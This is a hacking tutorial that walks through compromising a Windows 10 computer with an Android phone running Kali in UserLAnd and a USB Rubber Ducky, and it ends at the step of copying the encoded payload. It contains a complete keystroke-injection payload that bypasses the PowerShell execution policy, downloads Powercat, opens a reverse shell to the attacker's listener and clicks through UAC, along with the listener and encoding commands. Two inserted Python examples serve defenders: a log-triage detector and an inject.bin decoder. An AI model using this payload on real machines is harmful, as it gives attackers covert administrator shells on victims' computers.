With an unobtrusive Android phone and a USB flash drive, an attacker could compromise a Windows 10 computer in less than 15 seconds. After a root shell has been set up, the long-term persistence of the backdoor can be configured with just two simple commands – bypassing antivirus software and Windows Defender.
How this Attack Works
Powercat is a fully functional PowerShell module. It works much like Netcat and lets PowerShell users create TCP and UDP tunnels with simple command-line arguments. A PowerShell payload is created that downloads, imports, and runs Powercat with a single command. That payload is then encoded into a binary format that the USB Rubber Ducky can understand.
The USB Rubber Ducky runs Powercat on Windows 10.
Some hardware is required for this attack, and some of you may already have it lying around. The four main items are listed below.
1. USB Rubber Ducky
The USB Rubber Ducky identifies itself as a keyboard when plugged into a computer and then automatically types pre-programmed commands. The payload can be adapted to perform a variety of advanced exploits. Prices for the USB Rubber Ducky from Hak5 start at $45.
As an alternative to the USB Rubber Ducky, the NetHunter and DroidDucky projects can add keyboard (HID) emulation to Android devices. They require modifying the Android operating system, which is beyond the scope of this article. Both NetHunter and DroidDucky are fantastic projects for anyone willing to change the operating system of their phone. Imagine connecting an Android phone to a computer and running complex PowerShell payloads in seconds, with no USB Rubber Ducky required.
2. Android device with UserLAnd installed
Any Android phone or tablet running the UserLAnd app will work. The device does not need to be rooted. All that is required is Internet access via Wi-Fi and the UserLAnd application already mentioned.
3. OTG adapter (conditional)
After creating the PowerShell payload (in a later step), it must be moved to the microSD card of the USB Rubber Ducky. Some Android phones and tablets come with a microSD expansion slot for additional storage. If your device has one, transferring the file is straightforward.
If your device does not have a microSD slot, you will need an On-The-Go adapter (OTG) that allows you to connect memory cards to your device through the charging port. An all-in-one solution would be the Monoprice USB-C microSD reader if your phone has a USB Type-C port. Lexar offers a similar product for micro-USB ports.
Since the USB Rubber Ducky comes with a microSD to USB adapter, you can opt for an OTG adapter with a female USB Type-A end that the microSD adapter plugs into. If your Android device has a USB-C port, Aukey offers a good adapter. There are many low-cost options available for micro-USB ports, such as the Ugreen cable.
Alternatively, any combination of adapters can do the job. As you can see below, I'm using an Aukey adapter paired with an Anker portable card reader.
4. Virtual Private Server (optional)
Whether or not a Virtual Private Server (VPS) is required depends on the attack scenario. When a Wi-Fi network is shared with the target device, embedding the attacker's local IP address into the payload works fine. In other scenarios, it may be necessary to deploy a VPS or Ngrok server.
Step 1: Getting Started with UserLAnd
Before proceeding, read Distortion's guide on turning an Android phone into a hacking device without root and my guide to hacking WPA2 Wi-Fi passwords with Android, as they cover the basics of UserLAnd, setting up Kali Linux and Ngrok, and installing the software this article builds on. You must install and configure UserLAnd, create a new file system, and connect to the operating system over SSH using ConnectBot (or JuiceSSH or the built-in SSH client).
Step 2: Update the System and Install Essential Software
As with any Unix-based system, you should ensure that the installed packages are up to date before proceeding. Update the system, install the required software, and install Java, which is needed to compile the USB Rubber Ducky payload, using the following commands.
sudo apt-get update && sudo apt-get dist-upgrade
This command may take several minutes, depending on the available Internet speed and Android CPU. Older Android devices take longer to download and decompress packages.
Use the following command to install the required software.
sudo apt-get update && sudo apt-get install net-tools netcat gnupg curl wget git nano screen
Java is needed to compile Ducky payloads. Use the following command to install it.
sudo apt-get install default-jre-headless
Restart the Android device so that all package and kernel updates take effect the next time you launch the Kali OS in UserLAnd.
Step 3: Starting the Netcat Listener
There are several ways to set up the Netcat listener that provides remote access to the target Windows computer, depending on the attack scenario.
- Local IP Address. If the target computer is on the same Wi-Fi network as the Android device, the Netcat listener can simply be started in the UserLAnd Kali OS. Although private and fast, this method is not ideal. If and when the target disconnects from the shared Wi-Fi network, the Netcat connection is broken and there is no way to reach the device as it moves between networks.
- Virtual Private Server. A VPS is ideal for remotely accessing targets as they move between different Wi-Fi networks around the world. In this scenario, the attacker would buy a cheap VPS and SSH into it; Netcat and Screen would be installed on it for persistence. This can be set up entirely from Android.
- Ngrok. Setting up remote access with Ngrok was covered to some extent in "Hack WPA2 Wi-Fi Passwords with Android". In this case, Ngrok forwards requests to the attacker's Android device. Free Ngrok accounts do not allow users to reuse subdomains, so this only provides persistence until the Ngrok server on the Android device stops. Although it is possible to run a server on Android for a long time, it will inevitably shut down when the Android operating system restarts or when the background UserLAnd app is silently closed.
In any case, it is a good idea to set up Screen so that terminal sessions persist even when SSH connections are closed. With Screen, users can manage multiple terminal sessions in the same console. Readers are encouraged to learn how to use Screen, as it simplifies navigating between and "detaching" multiple terminal sessions without losing data.
To start a new Screen session, simply enter screen.
Then use the ifconfig -a command to identify the local IP address used by the system. This IP is needed in the next step when the payload is created.
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.0.208  netmask 255.255.255.0  broadcast 192.168.0.255
        inet6 :::::  prefixlen 64  scopeid 0x20<link>
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 1000  (UNSPEC)
        RX packets 95745  bytes 115985231 (110.6 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 44735  bytes 4289090 (4.0 MiB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0
Many interfaces will be listed in the UserLAnd Kali OS. The "wlan0" or "wlan1" interface most likely carries the device's local IP address (192.168.0.208). VPS users instead embed the server's external IP address, the same one they use when SSHing into it. Ngrok users must set up a server and embed the Ngrok URL in the payload.
Finally, start the Netcat Listener with the following command.
netcat -vv -l -p 1234
Netcat listens (-l) on every available interface using port (-p) 1234. The -vv (verbose) option prints the IP address of the target in the terminal when a new connection is made.
Step 4: Creating the Ducky Payload
After rebooting the Android device, launch the UserLAnd app and SSH into the new Kali system. Use nano to create a new "payload.txt" file in your home directory (~/). This file contains the Ducky payload in plain text.
nano ~/payload.txt
Comments (REM) have been added to explain the function of each payload line.
REM This first delay pauses the Ducky for 5.5 seconds to give the target
REM operating system some time to mount the USB as a keyboard device.
DELAY 5500
REM Opens the Windows Run prompt.
GUI r
REM Delays by 0.7 seconds to give the Run prompt time to open.
DELAY 700
REM Types the PowerShell payload.
STRING Powershell /w 1 /C $a=$env:TEMP;Set-ExecutionPolicy Bypass;wget https://cutt.ly/cW13i -o $a\d.ps1;ipmo $a\d.ps1;powercat -c 192.168.0.208 -p 1234 -e powershell
REM Presses Ctrl + Shift + Enter to run PowerShell with administrator privileges.
CTRL-SHIFT ENTER
REM Delays 0.85 seconds for the UAC prompt to open.
DELAY 850
REM Presses Alt + Y to answer Yes to the User Account Control prompt.
ALT y
There's a lot going on in the PowerShell one-liner. It consists of several commands separated by semicolons.
- $a=$env:TEMP - The target's temporary directory is stored in the variable $a. This variable is used twice later in the script: first as the output directory for powercat.ps1, and again on import. Using a single-letter variable helps shorten the overall length of the payload. This is more efficient than spelling out "C:\Users\%USERNAME%\AppData\Local\Temp" in the payload.
- Set-ExecutionPolicy Bypass - The execution policy is a PowerShell safety feature that blocks many script-based payloads like this one. In several tests, I found that setting the -ExecutionPolicy option was not enough to bypass this security feature. As administrator (root), this policy can be bypassed.
- wget https://cutt.ly/cW13i -o $a\d.ps1 - PowerShell is directed to make a web request (wget) and fetch powercat.ps1 via the shortened cutt.ly URL. This URL points directly to the Powercat GitHub page, but it can be replaced with the full URL or another shortened URL. The powercat.ps1 is saved in the temporary directory ($a) under the file name "d.ps1" (-o). The file name was shortened to a single letter to keep the Ducky payload as short as possible.
- ipmo $a\d.ps1 - The PowerShell Import-Module function is called using its alias ipmo, again using the shorter form of the command to keep the Ducky payload short. The downloaded powercat.ps1 is imported.
- powercat -c 192.168.0.208 -p 1234 -e powershell - Finally, Powercat is run and instructed to connect (-c) to the attacker's server (192.168.0.208) on port (-p) 1234 and execute (-e) PowerShell when the connection is established. This effectively gives the attacker a root PowerShell terminal.
The REM comments can remain in the payload and have no effect on the keystrokes. To save and exit nano, press Ctrl-X, then Y, then Enter.
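From the defender's side, the one-liner dissected above has several properties that stand out in PowerShell script block logging (Event ID 4104): a hidden window, an execution policy bypass, a download written to a file under $env:TEMP, an Import-Module of a .ps1 from a variable path, a URL shortener, and Powercat executing a shell. The following Python triage routine is an added example, not code from the original article or from the Powercat or Hak5 projects. The indicator names, the alert threshold, and the sample script blocks (with TEST-NET address 192.0.2.10 and a made-up cutt.ly path) are constructed for illustration; the regexes also accept the common long and short spellings of the same switches (-w hidden, -ep bypass, -OutFile), which goes beyond the single form the article uses.

```python
import re

# Indicators derived from the one-liner dissected above. The names are my own
# labels for this example, not a vendor's rule names.
INDICATORS = [
    ("execution_policy_bypass",          # Set-ExecutionPolicy Bypass, -ep bypass, ...
     re.compile(r"set-executionpolicy\s+(?:bypass|unrestricted)"
                r"|-(?:ep|ex|exec|executionpolicy)\s+(?:bypass|unrestricted)", re.I)),
    ("hidden_window",                    # /w 1, -w hidden, -WindowStyle Hidden
     re.compile(r"(?<!\w)[-/]w(?:indowstyle)?\s+(?:1|h|hidden)\b", re.I)),
    ("download_to_file",                 # wget/iwr/curl ... -o / -OutFile
     re.compile(r"\b(?:wget|iwr|curl|invoke-webrequest)\b[^;]*\s-o(?:utfile)?\s", re.I)),
    ("import_script_from_variable_path", # ipmo $a\x.ps1, Import-Module $env:TEMP\x.ps1
     re.compile(r"\b(?:ipmo|import-module)\s+\$[\w:]+\\[^;]*\.ps1", re.I)),
    ("powercat_exec",                    # powercat ... -e powershell|cmd
     re.compile(r"\bpowercat\b[^;]*-e\s+(?:powershell|cmd)\b", re.I)),
    ("url_shortener",                    # assumed list of common shorteners
     re.compile(r"https?://(?:cutt\.ly|bit\.ly|tinyurl\.com|t\.co)/", re.I)),
]

# Connect-back endpoint of a powercat client, for enrichment of the alert.
REMOTE_RE = re.compile(r"\bpowercat\b[^;]*-c\s+(\S+)\s+-p\s+(\d+)", re.I)


def scan_script_block(text):
    """Return the names of all indicators that fire on one script block."""
    return [name for name, rx in INDICATORS if rx.search(text)]


def extract_remote(text):
    """Return (host, port) of a powercat -c/-p connect-back, or None."""
    m = REMOTE_RE.search(text)
    return (m.group(1), int(m.group(2))) if m else None


def triage(events, alert_threshold=3):
    """events: iterable of (record_id, script_block_text) pairs.

    Three or more indicators in one block is treated as an alert; one or two
    is worth a look (an admin running '-ep bypass -File backup.ps1' is common);
    zero is clean. The threshold is a tuning knob, not a fixed standard.
    """
    results = []
    for record_id, text in events:
        hits = scan_script_block(text)
        verdict = ("alert" if len(hits) >= alert_threshold
                   else "review" if hits else "clean")
        results.append({"id": record_id, "verdict": verdict,
                        "indicators": hits, "remote": extract_remote(text)})
    return results


# Constructed sample script blocks (not real log data): a benign query, an
# admin script launch that only trips the policy check, and the full pattern
# from the article with TEST-NET address and a made-up short link.
SAMPLE_EVENTS = [
    ("4104-0001", r"Get-ChildItem -Path C:\Users\alice\Documents -Recurse | Measure-Object"),
    ("4104-0002", r"powershell -ep bypass -File C:\scripts\nightly-backup.ps1"),
    ("4104-0003", r"Powershell /w 1 /C $a=$env:TEMP;Set-ExecutionPolicy Bypass;"
                  r"wget https://cutt.ly/EXAMPLE -o $a\d.ps1;ipmo $a\d.ps1;"
                  r"powercat -c 192.0.2.10 -p 1234 -e powershell"),
]

if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(f"{r['id']}: {r['verdict']:6} {r['indicators']} remote={r['remote']}")
```

Script block logging must be enabled for these events to exist at all; once it is, the combination of indicators in one block is a far stronger signal than any single one, which is why the routine scores them together rather than alerting on, say, every execution policy change.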
Step 5: Encoding the Payload
USB Rubber Ducky payloads cannot be loaded onto the microSD card in plain text. Instead, the Hak5 Duck Encoder is used to convert the plaintext payload into a binary format.
To clone the Duck Encoder repository, use the following command.
git clone https://github.com/hak5darren/USB-Rubber-Ducky/
Change (cd) into the newly created Encoder/ directory.
cd USB-Rubber-Ducky/Encoder/
Then encode payload.txt using the command below. It uses the encoder.jar file to convert the input file (-i) into the required binary file "inject.bin" (-o). The output file name is not arbitrary: it must be "inject.bin" for the Ducky to type the keystrokes.
java -jar encoder.jar -i ~/payload.txt -o inject.bin
Hak5 Duck Encoder 2.6.4

Loading File .....		[ OK ]
Loading Keyboard File .....	[ OK ]
Loading Language File .....	[ OK ]
Loading DuckyScript .....	[ OK ]
DuckyScript Complete .....	[ OK ]
When this is done, there will be a new "inject.bin" file in the Encoder/ directory. This can be verified with the command ls -l.
-rw-r--r--. 1 root root  1466 Jan 11 11:39 README
-rw-r--r--. 1 root root 57535 Jan 11 11:39 encoder.jar
-rw-r--r--. 1 root root    86 Jan 12 01:57 inject.bin
drwxr-xr-x. 2 root root  4096 Jan 11 11:39 resources
drwxr-xr-x. 2 root root  4096 Jan 11 11:39 src
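For an incident responder who recovers a Ducky's microSD card, the useful direction is the reverse of this step: turning inject.bin back into readable DuckyScript to learn what was typed. The following Python decoder is an added example, not part of the article or of Hak5's encoder. It assumes the record layout the Hak5 encoder produces, two bytes per record with the HID usage ID first and the modifier byte second, where a usage ID of 0x00 marks a delay record whose second byte is a millisecond count (the encoder splits longer delays into 255 ms chunks, which the decoder sums back together, so two adjacent DELAY lines in the source would merge into one). The key table is a US-layout subset, and the sample bytes are constructed rather than taken from a real capture.

```python
# Standard USB HID usage IDs for a US layout (subset). Each entry maps a
# usage ID to its (unshifted, shifted) glyph.
_LETTERS = {0x04 + i: (chr(ord("a") + i), chr(ord("A") + i)) for i in range(26)}
_DIGITS = dict(zip(range(0x1E, 0x27), zip("123456789", "!@#$%^&*(")))
_DIGITS[0x27] = ("0", ")")
_PUNCT = {0x2C: (" ", " "), 0x2D: ("-", "_"), 0x2E: ("=", "+"), 0x2F: ("[", "{"),
          0x30: ("]", "}"), 0x31: ("\\", "|"), 0x33: (";", ":"), 0x34: ("'", '"'),
          0x35: ("`", "~"), 0x36: (",", "<"), 0x37: (".", ">"), 0x38: ("/", "?")}
PRINTABLE = {**_LETTERS, **_DIGITS, **_PUNCT}

# Non-printing keys, named the way DuckyScript spells them.
SPECIAL = {0x28: "ENTER", 0x29: "ESCAPE", 0x2A: "BACKSPACE", 0x2B: "TAB",
           0x39: "CAPSLOCK", 0x4C: "DELETE", 0x4F: "RIGHTARROW",
           0x50: "LEFTARROW", 0x51: "DOWNARROW", 0x52: "UPARROW"}
SPECIAL.update({0x3A + i: f"F{i + 1}" for i in range(12)})

# Modifier bits; the right-hand variants sit four bits higher and are folded in.
MODIFIERS = ((0x01, "CTRL"), (0x02, "SHIFT"), (0x04, "ALT"), (0x08, "GUI"))


def decode_inject_bin(blob):
    """Translate inject.bin bytes back into DuckyScript-style lines."""
    if len(blob) % 2:
        raise ValueError("inject.bin must consist of 2-byte records")
    lines, text, delay = [], [], 0

    def flush_text():
        if text:
            lines.append("STRING " + "".join(text))
            text.clear()

    def flush_delay():
        nonlocal delay
        if delay:
            lines.append(f"DELAY {delay}")
            delay = 0

    for key, mod in zip(blob[0::2], blob[1::2]):
        if key == 0x00:                 # delay record: second byte is ms (<= 255)
            flush_text()
            delay += mod
            continue
        flush_delay()
        mods = [name for bit, name in MODIFIERS if mod & (bit | bit << 4)]
        shifted_only = mods == ["SHIFT"]
        if key in PRINTABLE and (not mods or shifted_only):
            # Plain or shifted glyph: part of a STRING run.
            text.append(PRINTABLE[key][1 if shifted_only else 0])
            continue
        flush_text()                    # a chord or special key ends the run
        keyname = SPECIAL.get(key) or (
            PRINTABLE[key][0] if key in PRINTABLE else f"KEY_0x{key:02X}")
        lines.append("-".join(mods) + (" " if mods else "") + keyname)
    flush_text()
    flush_delay()
    return lines


# Constructed sample (not a real capture): DELAY 500, GUI r, DELAY 300,
# STRING cmd, ENTER written out in the two-byte record format.
SAMPLE_INJECT_BIN = bytes([
    0x00, 0xFF, 0x00, 0xF5,              # DELAY 500 (255 + 245)
    0x15, 0x08,                          # GUI r (usage 0x15 = 'r', 0x08 = GUI)
    0x00, 0xFF, 0x00, 0x2D,              # DELAY 300 (255 + 45)
    0x06, 0x00, 0x10, 0x00, 0x07, 0x00,  # STRING cmd
    0x28, 0x00,                          # ENTER
])

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_INJECT_BIN
    print("\n".join(decode_inject_bin(data)))
```

Run it against a recovered inject.bin to get the keystroke sequence in readable form; only the keystrokes survive, so REM comments from the original payload.txt are gone, and a payload built for a non-US layout needs the matching key table.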
Step 6: Connect the Ducky MicroSD to the Android device
Insert the Ducky's microSD card into the Android device using the card reader adapter, the internal microSD slot, or the OTG adapter with a card reader. The contents of the microSD card can be viewed with the Android Downloads app.
After a few seconds, a new removable storage device appears in the Downloads app. Navigate back to the Kali OS terminal. The Kali OS does not have direct access to external storage devices such as the microSD card, so "inject.bin" must first be copied (cp) to the /sdcard/Download/ directory and then copied to the microSD card using the Android operating system.
cp ~/USB-Rubber-Ducky/Encoder/inject.bin /sdcard/Download/
It is now available in the Downloads app.